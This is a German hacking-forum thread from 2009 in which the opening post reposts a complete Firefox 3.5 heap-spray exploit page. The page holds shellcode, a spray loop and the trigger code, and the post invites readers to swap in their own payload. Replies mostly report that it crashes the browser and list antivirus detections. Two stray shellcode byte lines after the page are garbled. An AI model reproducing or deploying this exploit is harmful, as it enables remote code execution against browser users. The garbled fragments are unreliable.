Autor Thema: Remote Buffer Overflow "Firefox 3.5"  (Gelesen 321 mal)

0 Mitglieder und 1 Gast betrachten dieses Thema.

fred777

  • Sr. Member
  • ****
  • Beiträge: 265
  • Karma: 0
    • Profil anzeigen
    • http://www.fred777.1x.to
Remote Buffer Overflow "Firefox 3.5"
« am: Juli 16, 2009, 02:23:21 Nachmittag »
Noch neu, allerdings bei den Tests nicht immer funktionsfähig, so auch bei mir, trotzdem netter Fund, vielleicht funktioniert es ja bei euch, Shellcode könnt ihr ja selbst einfügen, bzw anpassen...
<html>
<head>
<title>Firefox 3.5 Vulnerability</title>
Firefox 3.5 Heap Spray Vulnerabilty
</br>
Author: SBerry aka Simon Berry-Byrne
</br>
Thanks to HD Moore for the insight and Metasploit for the payload
<div id=content&quot;>
<p>
<FONT>                            
</FONT>
</p>
<p>
<FONT>Loremipsumdoloregkuw</FONT></p>
<p>
<FONT>Loremipsumdoloregkuwiert</FONT>
</p>
<p>
<FONT>Loremikdkw  </FONT>
</p>
</div>
<script language=JavaScript>
 
/* Calc.exe */
var shellcode = unescape(&quot;%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800&quot; +  
                       &quot;%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A&quot; +  
                       &quot;%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350&quot; +  
                       &quot;%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40&quot; +  
                       &quot;%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000&quot; +  
                       &quot;%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040&quot; +  
                       &quot;%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD&quot; +  
                       &quot;%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40&quot; +  
                       &quot;%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18&quot; +  
                       &quot;%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0&quot; +  
                       &quot;%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B&quot; +  
                       &quot;%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24&quot; +  
                       &quot;%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9&quot; +  
                       &quot;%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C&quot; +  
                       &quot;%u652E%u6578%u9000&quot;);
/* Heap Spray Code */            
oneblock = unescape(&quot;%u0c0c%u0c0c&quot;);
var fullblock = oneblock;
while (fullblock.length<0x60000)  
{
    fullblock += fullblock;
}
sprayContainer = new Array();
for (i=0; i<600; i++)  
{
    sprayContainer[i] = fullblock + shellcode;
}
var searchArray = new Array()
 
function escapeData(data)
{
 var i;
 var c;
 var escData='';
 for(i=0;i<data.length;i++)
  {
   c=data.charAt(i);
   if(c=='&' || c=='?' || c=='=' || c=='%' || c==' ') c = escape(c);
   escData+=c;
  }
 return escData;
}
 
function DataTranslator(){
    searchArray = new Array();
    searchArray[0] = new Array();
    searchArray[0][&quot;str] = &quot;blah&quot;;
    var newElement = document.getElementById(&quot;content&quot;)
    if (document.getElementsByTagName) {
        var i=0;
        pTags = newElement.getElementsByTagName(&quot;p&quot;)
        if (pTags.length > 0)  
        while (i<pTags.length)
        {
            oTags = pTags[i].getElementsByTagName(&quot;font&quot;)
            searchArray[i+1] = new Array()
            if (oTags[0])  
            {
                searchArray[i+1][&quot;str&quot;] = oTags[0].innerHTML;
            }
            i++
        }
    }
}
 
function GenerateHTML()
{
    var html = &quot;&quot;;
    for (i=1;i<searchArray.length;i++)
    {
        html += escapeData(searchArray[i][&quot;str&quot;])
    }    
}
DataTranslator();
GenerateHTML()
</script>
</body>
</html>
<html><body></body></html>
"\x68\x6e\x2r\x73\x68" // push dword 68732f6eh
"\x68\x2f\x2f\x62\x69" // push dword 69622f7fh

alexj.

  • Full Member
  • ***
  • Beiträge: 148
  • Karma: 10
    • Profil anzeigen
Remote Buffer Overflow "Firefox 3.5"
« Antwort #1 am: Juli 16, 2009, 02:37:07 Nachmittag »
Bei mir gehts :)

Stürzt halt Firefox ab aber naja hat mir mein Lied versaut aber ok :D
Bog cuva srbe


//ins0.!

  • 0-day devel0pment
  • Full Member
  • ***
  • Beiträge: 196
  • Karma: 0
    • Profil anzeigen
Remote Buffer Overflow "Firefox 3.5"
« Antwort #2 am: Juli 16, 2009, 02:37:26 Nachmittag »
kas meckert schon
..2x2m Programmierboxen mit Neonlicht, sind definitiv geil!..

"just find an easy way into the database..."

~ the default is never good enough...


Dr.ChAoS

  • Nasenflöter
  • Newbie
  • *
  • Beiträge: 38
  • Karma: 0
    • Profil anzeigen
Remote Buffer Overflow "Firefox 3.5"
« Antwort #3 am: Juli 16, 2009, 02:43:42 Nachmittag »
Bei mir ist nur der Firefox abgestürzt. (Windows + Linux)
MfG

Dr.ChAoS

Klicke auf Das Bild um auch in meine SigiBox zu schreiben.
Jabber: dr.chaos@jabber.org - Nutzt Jabber!
Zitat von: GanonTC;21735
Man stirbt nicht von heute auf morgen.

fella

  • Jr. Member
  • **
  • Beiträge: 72
  • Karma: 10
    • Profil anzeigen
Remote Buffer Overflow "Firefox 3.5"
« Antwort #4 am: Juli 16, 2009, 02:43:59 Nachmittag »
avira mäckert auch :( aber er geht :D

Blacktiger

  • Full Member
  • ***
  • Beiträge: 213
  • Karma: 0
    • Profil anzeigen
Remote Buffer Overflow "Firefox 3.5"
« Antwort #5 am: Juli 16, 2009, 02:46:01 Nachmittag »
KAV meldet : Exploit.JS.FoxFir.a
Funzt noch, hat mein FF voll gefickt xD



Serverspy

  • Full Member
  • ***
  • Beiträge: 115
  • Karma: 10
    • Profil anzeigen
Remote Buffer Overflow "Firefox 3.5"
« Antwort #6 am: Juli 16, 2009, 03:40:54 Nachmittag »
FF abgekackt... Norton und Avira haben zwar zuvor aufgeheult, aber hat gefunzt...
FF 3.5 und Vista auf HP Pavillon

DimeX

  • Full Member
  • ***
  • Beiträge: 124
  • Karma: 0
    • Profil anzeigen
Remote Buffer Overflow "Firefox 3.5"
« Antwort #7 am: Juli 16, 2009, 03:53:15 Nachmittag »
Es ist ja gut, ihr müsst ja nicht alle schreiben das es bei euch Funktioniert... wenn 2 das gemacht hätten, hätte es doch gereicht!

Kind regards
DimeX


Doch es ist uns scheissegal, was ihr denkt und wie ihr redet. Doch geht uns aus dem Weg, wenn ihr uns begegnet. Erzählt doch eure Lügen, hetzt doch alle gegen uns auf. Schreibt euch eins hinter eure Ohren: Wir geben niemals auf.

Jetzt sind wir da,
und schlagen ein wie eine Bombe,
wie tollwütige Wölfe,
und hart wie deutscher Stahl.